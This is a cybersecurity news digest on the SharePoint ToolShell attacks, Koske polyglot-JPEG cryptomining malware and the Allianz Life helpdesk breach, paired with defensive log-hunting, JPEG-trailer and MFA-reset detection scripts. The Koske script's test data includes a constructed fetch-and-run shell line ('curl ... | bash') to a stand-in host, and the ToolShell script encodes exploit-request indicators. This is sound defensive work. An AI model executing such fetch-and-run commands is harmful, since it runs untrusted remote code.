SparTech Software CyberPulse – Your quick strike cyber update for July 30, 2025 7:06 PM

Microsoft SharePoint Zero-Day Attacks Target Hundreds of Organizations Globally

In July 2025, a chain of zero-day vulnerabilities in on-premises Microsoft SharePoint Server was exploited in a coordinated global campaign against banks, universities, healthcare providers, government agencies and enterprises, with more than 400 confirmed victims across North America, Europe and Asia. The chain gives an unauthenticated attacker remote code execution and full administrative control of the server, which prompted urgent advisories from Microsoft and national cybersecurity authorities. SharePoint Online in Microsoft 365 is not affected; the exposure is limited to self-hosted servers.

Overview of the Vulnerabilities

The underlying flaws, an authentication bypass chained with a deserialization-based remote code execution bug, were first demonstrated at the Pwn2Own Berlin contest in May 2025. The variants exploited in the wild (the chain is widely referred to as ToolShell) are tracked as CVE-2025-53770, the remote code execution flaw rated CVSS 9.8, and CVE-2025-53771, the bypass component rated 7.1. Together they let an attacker run arbitrary code and obtain administrative access on unpatched on-premises SharePoint Server 2016, 2019 and Subscription Edition installations.

The patches released on July 8 for the Pwn2Own bugs proved insufficient: attackers found a bypass within days, in-the-wild exploitation of the bypass was observed from about July 18, and Microsoft had to ship out-of-band fixes for Subscription Edition, SharePoint 2019 and SharePoint 2016 over July 19 to 21. Consequently, tens of thousands of servers remained exposed after the first remediation, and a server that was already compromised is not made safe by the patch alone, because the intrusion steals the server's ASP.NET machine keys, which let the attacker forge validly signed requests after patching.

Attribution and Campaign Details

Microsoft's investigation attributed the campaign to three China-based threat actors: Linen Typhoon, Violet Typhoon and Storm-2603. Storm-2603 in particular was seen pairing the SharePoint exploit with deployment of Warlock ransomware. Reported victims include the US National Nuclear Security Administration.

Attackers demonstrated detailed knowledge of SharePoint internals. The observed payload is a small ASP.NET page dropped into the SharePoint LAYOUTS directory (widely reported under the name spinstall0.aspx) that does not behave like a conventional web shell: its job is to read and return the server's ASP.NET machine keys (ValidationKey and DecryptionKey). With those keys the attacker can sign malicious __VIEWSTATE payloads and regain code execution on demand, even after the vulnerability itself is patched. Because SharePoint is integrated with Teams, OneDrive and Office, a compromised server also exposes the sensitive files that flow through those business-critical applications.

Mitigation Recommendations

Given the campaign's scope and sophistication, CISA and Microsoft issued urgent guidance: apply the out-of-band updates immediately; enable the Antimalware Scan Interface (AMSI) integration in SharePoint together with Microsoft Defender Antivirus (or another AMSI-capable product) on every SharePoint server; rotate the ASP.NET machine keys after patching and restart IIS, since keys stolen before the patch remain usable otherwise; and disconnect from the internet any server that cannot be patched or cannot run AMSI, including out-of-support versions such as SharePoint 2013 and earlier. The advisories also stressed the potential for lateral movement, recommending network segmentation and a full forensic review of any environment where the exploit request pattern or the dropped page is found, treating such a server as compromised rather than merely vulnerable.
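
The forensic review above starts with the web server logs. The following script is an added example for this page, not code from Microsoft, CISA or the original article: it hunts IIS W3C access logs for two indicators that were published for this campaign, a POST to /_layouts/15/ToolPane.aspx with DisplayMode=Edit whose Referer is /_layouts/SignOut.aspx (the authentication-bypass request) and any request for spinstall0.aspx or a numbered variant (the key-dumping page). The log excerpt it runs over is constructed for the example.

```python
"""Hunt IIS W3C access logs for the published ToolShell request pattern.

Added example for this page; not code from Microsoft, CISA or the article.
Indicators: POST /_layouts/.../ToolPane.aspx?DisplayMode=Edit with a
SignOut.aspx Referer, and any request for spinstall<N>.aspx.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Iterable, Iterator

SPINSTALL = re.compile(r"/spinstall\d*\.aspx$")


@dataclass(frozen=True)
class Hit:
    line_no: int
    client_ip: str
    indicator: str
    uri: str
    status: str


def parse_w3c(lines: Iterable[str]) -> Iterator[tuple[int, dict[str, str]]]:
    """Yield (line number, field dict). Field names come from the #Fields:
    directive, so a log with a different column order still parses; lines
    whose column count does not match are skipped rather than crashing."""
    fields: list[str] = []
    for n, raw in enumerate(lines, 1):
        line = raw.rstrip("\r\n")
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        parts = line.split(" ")
        if fields and len(parts) == len(fields):
            yield n, dict(zip(fields, parts))


def classify(rec: dict[str, str]) -> str | None:
    """Return an indicator name for a suspicious request, else None.
    A legitimate page edit also POSTs to ToolPane.aspx, so the bypass rule
    additionally requires the SignOut.aspx Referer seen in the exploit."""
    stem = rec.get("cs-uri-stem", "").lower()
    query = rec.get("cs-uri-query", "").lower()
    referer = rec.get("cs(Referer)", "").lower()
    method = rec.get("cs-method", "").upper()
    if SPINSTALL.search(stem):
        return "spinstall-webshell"
    if (method == "POST"
            and "/_layouts/" in stem and stem.endswith("/toolpane.aspx")
            and "displaymode=edit" in query
            and referer.endswith("/_layouts/signout.aspx")):
        return "toolpane-auth-bypass"
    return None


def hunt(lines: Iterable[str]) -> list[Hit]:
    hits = []
    for n, rec in parse_w3c(lines):
        indicator = classify(rec)
        if indicator:
            uri = rec["cs-uri-stem"]
            if rec.get("cs-uri-query", "-") != "-":
                uri += "?" + rec["cs-uri-query"]
            hits.append(Hit(n, rec.get("c-ip", "?"), indicator, uri, rec.get("sc-status", "?")))
    return hits


def by_client(hits: list[Hit]) -> dict[str, list[str]]:
    """Group indicator names per client IP; a client showing both the bypass
    POST and the spinstall GET has very likely completed the exploit chain."""
    out: dict[str, list[str]] = {}
    for h in hits:
        out.setdefault(h.client_ip, []).append(h.indicator)
    return out


# Constructed IIS log excerpt (not a real capture). The last line is an
# administrator editing a page through ToolPane.aspx with a normal Referer
# and must not fire.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2025-07-18 12:01:02 10.0.0.5 GET /sites/hr/Shared+Documents/Forms/AllItems.aspx - 443 CONTOSO\\jdoe 10.0.1.20 Mozilla/5.0 https://sp.contoso.local/sites/hr 200 0 0 45
2025-07-18 12:03:17 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit&a=/ToolPane.aspx 443 - 203.0.113.44 Mozilla/5.0+(Windows+NT+10.0) https://sp.contoso.local/_layouts/SignOut.aspx 200 0 0 118
2025-07-18 12:03:19 10.0.0.5 GET /_layouts/15/spinstall0.aspx - 443 - 203.0.113.44 Mozilla/5.0+(Windows+NT+10.0) - 200 0 0 12
2025-07-18 12:05:00 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit 443 CONTOSO\\admin 10.0.1.9 Mozilla/5.0 https://sp.contoso.local/sites/hr/_layouts/15/settings.aspx 200 0 0 80
"""

if __name__ == "__main__":
    found = hunt(SAMPLE_LOG.splitlines())
    for hit in found:
        print(f"line {hit.line_no}: {hit.indicator} from {hit.client_ip} -> {hit.uri} (HTTP {hit.status})")
    print(by_client(found))
```

An HTTP 200 on the spinstall request means the page was served, that is, the key-dumping stage ran; treat that host's machine keys as stolen regardless of whether the patch has since been applied.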

AI-Enabled Koske Linux Malware Uses Polyglot JPEG Images and Exposed JupyterLab Instances for Stealthy Cryptomining

In late July 2025, cybersecurity researchers described a novel Linux malware strain named "Koske" that combines code apparently produced with the help of a large language model, polyglot JPEG files that carry its payload, and abuse of misconfigured JupyterLab instances to deploy a cryptominer and a userland rootkit that run largely in memory and evade conventional file-based detection.

Technical Characteristics of Koske Malware

Koske's delivery is often described as steganography, but the panda images are polyglot files rather than pixel-level hiding: each is a structurally valid JPEG, so it renders as a harmless picture and passes image checks, followed by a payload appended after the end of the image data. In the observed samples one image carried a shell script and the other C source for a userland rootkit; the loader downloads the file, slices off the trailing bytes and executes them directly, compiling the C code into a shared object loaded via LD_PRELOAD so that the miner's files and processes are hidden from directory listings. The researchers assessed the code as likely LLM-assisted from its structure and comments; the "AI" element concerns how the malware was produced, which leaves it with little signature overlap with older families, rather than a runtime mutation engine.
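
The check a defender wants for this technique is to find where the image really ends and look at what follows. The script below is an added example for this page, not code from the Koske researchers or the original article: it walks the JPEG marker structure to the End-Of-Image marker (FF D9), splits off anything appended after it, and classifies the trailer. The sample "image" is a constructed marker skeleton with constructed payloads, not a real photo or a real Koske sample.

```python
"""Split a JPEG into image and appended trailer, and classify the trailer.

Added example for this page, not code from the Koske researchers or the
article. A polyglot of this kind is a valid JPEG whose payload sits after
the EOI marker, so viewers show the picture while a loader runs the tail.
"""
from __future__ import annotations

import re

SOI, EOI, SOS = 0xD8, 0xD9, 0xDA
RST = range(0xD0, 0xD8)                      # restart markers, no length field
STANDALONE = {0x01, *RST}                    # TEM and RSTn carry no payload


def find_eoi(data: bytes) -> int | None:
    """Return the offset just past the EOI marker, or None if the data is not
    a well-formed JPEG stream. Walks length-prefixed segments up to SOS, then
    scans entropy-coded data, where FF 00 is a stuffed byte and FF D0..D7 are
    restart markers rather than segment boundaries."""
    if len(data) < 4 or data[0] != 0xFF or data[1] != SOI:
        return None
    i = 2
    while i < len(data):
        if data[i] != 0xFF:
            return None
        while i < len(data) and data[i] == 0xFF:   # fill bytes before a marker
            i += 1
        if i >= len(data):
            return None
        marker = data[i]
        i += 1
        if marker == EOI:
            return i
        if marker in STANDALONE:
            continue
        if i + 2 > len(data):
            return None
        seg_len = int.from_bytes(data[i:i + 2], "big")
        if seg_len < 2:
            return None
        i += seg_len
        if marker == SOS:
            while i + 1 < len(data):
                nxt = data[i + 1]
                if data[i] == 0xFF and nxt != 0x00 and nxt not in RST:
                    break
                i += 1
    return None


SIGNATURES = [
    ("elf-binary", re.compile(rb"\A\x7fELF")),
    ("shell-script", re.compile(rb"\A\s*#!\s*/(?:usr/)?bin/(?:env\s+)?(?:ba|z|da)?sh\b")),
    ("python-script", re.compile(rb"\A\s*#!.*python")),
    ("c-source", re.compile(rb"#include\s*<[\w./]+>|\bint\s+main\s*\(")),
]


def classify_trailer(tail: bytes) -> str:
    """Name what follows the image. A few zero or whitespace bytes after EOI
    are normal padding and are not reported."""
    if not tail.strip(b"\x00\r\n\t "):
        return "none"
    for name, pattern in SIGNATURES:
        if pattern.search(tail):
            return name
    return "unknown-trailer"


def analyze(data: bytes) -> dict:
    """Summarise a candidate file: validity, image size, trailer size and kind."""
    end = find_eoi(data)
    if end is None:
        return {"valid_jpeg": False, "image_bytes": 0, "trailer_bytes": 0, "trailer_kind": "n/a"}
    tail = data[end:]
    return {"valid_jpeg": True, "image_bytes": end,
            "trailer_bytes": len(tail), "trailer_kind": classify_trailer(tail)}


def build_sample(payload: bytes) -> bytes:
    """Constructed JPEG skeleton: SOI, APP0/JFIF, SOS, a little scan data that
    includes a stuffed FF 00 and an RST0 marker, then EOI. Enough to exercise
    the parser; it is not a decodable picture."""
    app0 = b"\xff\xe0" + (16).to_bytes(2, "big") + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    sos = b"\xff\xda" + (8).to_bytes(2, "big") + b"\x01\x01\x00\x00\x3f\x00"
    scan = b"\x12\x34\xff\x00\x56\xff\xd0\x78"
    return b"\xff\xd8" + app0 + sos + scan + b"\xff\xd9" + payload


# Constructed payloads standing in for the two trailer kinds described above
SHELL_TAIL = b"#!/bin/bash\ncurl -s http://example.invalid/x | bash\n"
C_TAIL = b"#include <dirent.h>\n/* constructed stand-in for a readdir hook */\n"


if __name__ == "__main__":
    for label, blob in [("clean", build_sample(b"")),
                        ("shell polyglot", build_sample(SHELL_TAIL)),
                        ("c polyglot", build_sample(C_TAIL))]:
        print(label, analyze(blob))
```

Run it over the image cache of a Jupyter host or the downloads a proxy has seen; a picture with a non-empty trailer is worth a look regardless of its name or source, since the hosting service in this campaign was legitimate.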

Initial access comes through exposed or misconfigured JupyterLab instances (potentially via CVE-2025-30370). Once inside, the malware sets up persistence and hardens its own foothold: it executes its payloads in memory rather than from disk, fetches the polyglot images from legitimate image-hosting services so the downloads look like ordinary picture retrievals, and rewrites /etc/resolv.conf to public resolvers and locks it with chattr +i so that DNS-based blocking is defeated.

Attack Chain and Evasion Strategies

After gaining access, Koske establishes long-term presence through cron jobs, systemd units and shell startup files so that it survives reboots and basic clean-up attempts. Its mining component is modular: it evaluates the host's CPU and GPU, picks the most profitable of several supported coins, and falls back to another coin or pool if one becomes unreachable, while throttling resource use to avoid performance-related alerts.

The design suggests active, ongoing development. Because the code was generated afresh rather than copied from older families, it shares few signatures with them, which makes hunting with traditional indicators of compromise harder and pushes defenders towards behavioural detection.

Target Environment and Response Recommendations

Koske primarily targets organizations running scientific computing and machine learning workloads, where unmanaged or poorly secured Jupyter infrastructure is common. Audit all cloud and on-premises JupyterLab deployments: require token or password authentication, bind instances to localhost or place them behind an authenticating proxy or VPN rather than exposing them directly, and patch or firewall any public-facing instance. On the network side, watch Jupyter hosts for unusual outbound connections, in particular image downloads from public image-hosting services followed by connections to mining pools or proxies, and on the host for an /etc/resolv.conf that has been made immutable.

Allianz Life Insurance Supply-Chain Data Breach Exposes Information of 1.4 Million U.S. Customers

In late July 2025, Allianz Life Insurance Company of North America disclosed a significant data breach: on July 16, an attacker gained access to a third-party, cloud-based customer relationship management (CRM) system used by the insurer. Using targeted social engineering, the attacker obtained personal information on the majority of Allianz Life's 1.4 million U.S. customers, as well as financial professionals and select employees.

Attack Methodology and Impact

The breach reportedly began with social engineering of helpdesk staff at a third-party service provider: agents were talked into divulging credentials and performing multifactor authentication resets without adequate identity verification, which gave the attacker access to the cloud CRM environment.

Allianz's investigation, conducted with the FBI, found no evidence that the attacker moved laterally beyond the CRM environment, but the exposed data included personal and policy information, raising significant privacy and regulatory concerns. Allianz began notifying affected individuals and state regulators as required by U.S. state breach-notification laws.

Broader Implications and Industry Context

The Allianz breach is one of several high-profile social engineering and supply-chain incidents reported in the insurance sector in recent months. They highlight a persistent threat vector in which adversaries exploit trusted third-party relationships and human error to bypass technical controls entirely.

Experts recommend strict access-control processes for all vendors, helpdesk verification that cannot be satisfied with publicly available or previously leaked personal data (for example a callback to a number on record or manager approval before any MFA reset), and regular audits of MFA reset procedures. Early detection of credential misuse, such as a reset followed by a sign-in from an unfamiliar location, remains critical for containment and recovery.
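
The detection mentioned above can be expressed as a simple correlation rule. The script below is an added example for this page, not code from Allianz, its vendor or the original article: it flags an MFA reset that is followed within a short window by a sign-in from an IP address the account has never used before, and escalates a reset that carries no ticket reference. The event fields, the window and the log lines are constructed for the example and do not follow any vendor's schema.

```python
"""Correlate helpdesk MFA resets with the sign-ins that follow them.

Added example for this page; not code from Allianz, its vendor or the
article. Event format, field names and the sample log are constructed.
"""
from __future__ import annotations

from collections import defaultdict
from datetime import datetime, timedelta


def parse_events(lines) -> list[dict]:
    """Line format (constructed): '<iso-timestamp> <user> <event> key=value ...'.
    Returns events sorted by time so later passes can rely on order."""
    events = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, user, event, *kvs = line.split()
        attrs = dict(kv.split("=", 1) for kv in kvs)
        events.append({"ts": datetime.fromisoformat(ts), "user": user,
                       "event": event, **attrs})
    return sorted(events, key=lambda e: e["ts"])


def correlate(events: list[dict], window_minutes: int = 120) -> list[dict]:
    """Return one alert per (reset, suspicious sign-in) pair.

    The baseline of known IPs for an account is everything it signed in from
    before the reset. The sign-in under inspection is deliberately not added
    to the baseline first; otherwise the attacker's own login would whitelist
    itself. window_minutes (default 120) is an assumed tuning value."""
    window = timedelta(minutes=window_minutes)
    by_user: dict[str, list[dict]] = defaultdict(list)
    for e in events:
        by_user[e["user"]].append(e)

    alerts = []
    for user, evs in by_user.items():
        known_ips: set[str] = set()
        for idx, e in enumerate(evs):
            if e["event"] == "signin":
                known_ips.add(e["ip"])
                continue
            if e["event"] != "mfa_reset":
                continue
            baseline = set(known_ips)            # snapshot at reset time
            for later in evs[idx + 1:]:
                if later["ts"] - e["ts"] > window:
                    break
                if later["event"] == "signin" and later["ip"] not in baseline:
                    reasons = ["signin_from_new_ip_after_reset"]
                    if e.get("ticket", "-") == "-":
                        reasons.append("reset_without_ticket")
                    alerts.append({"user": user, "reset_at": e["ts"].isoformat(),
                                   "reset_by": e.get("actor", "?"),
                                   "signin_at": later["ts"].isoformat(),
                                   "ip": later["ip"], "reasons": reasons})
    return alerts


# Constructed log excerpt (not real data). alice: a reset without a ticket,
# then a login from an address never seen for her. bob: a ticketed reset
# followed by a login from his usual address, which must stay quiet. alice's
# final login is from a new address but hours later, outside the window.
SAMPLE_EVENTS = """
2025-07-16T09:05:00 alice signin ip=10.0.1.20
2025-07-16T09:40:00 alice signin ip=10.0.1.20
2025-07-16T13:02:00 alice mfa_reset actor=helpdesk-svc ticket=-
2025-07-16T13:09:00 alice signin ip=203.0.113.77
2025-07-16T10:00:00 bob signin ip=10.0.2.5
2025-07-16T11:00:00 bob mfa_reset actor=helpdesk-svc ticket=INC-4412
2025-07-16T11:03:00 bob signin ip=10.0.2.5
2025-07-16T16:30:00 alice signin ip=198.51.100.9
"""

if __name__ == "__main__":
    for alert in correlate(parse_events(SAMPLE_EVENTS.splitlines())):
        print(alert)
```

In production the baseline would come from weeks of sign-in history and "new IP" would usually be widened to "new ASN or country", but the ordering subtlety is the same: snapshot the baseline at reset time, never after the sign-in you are judging.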
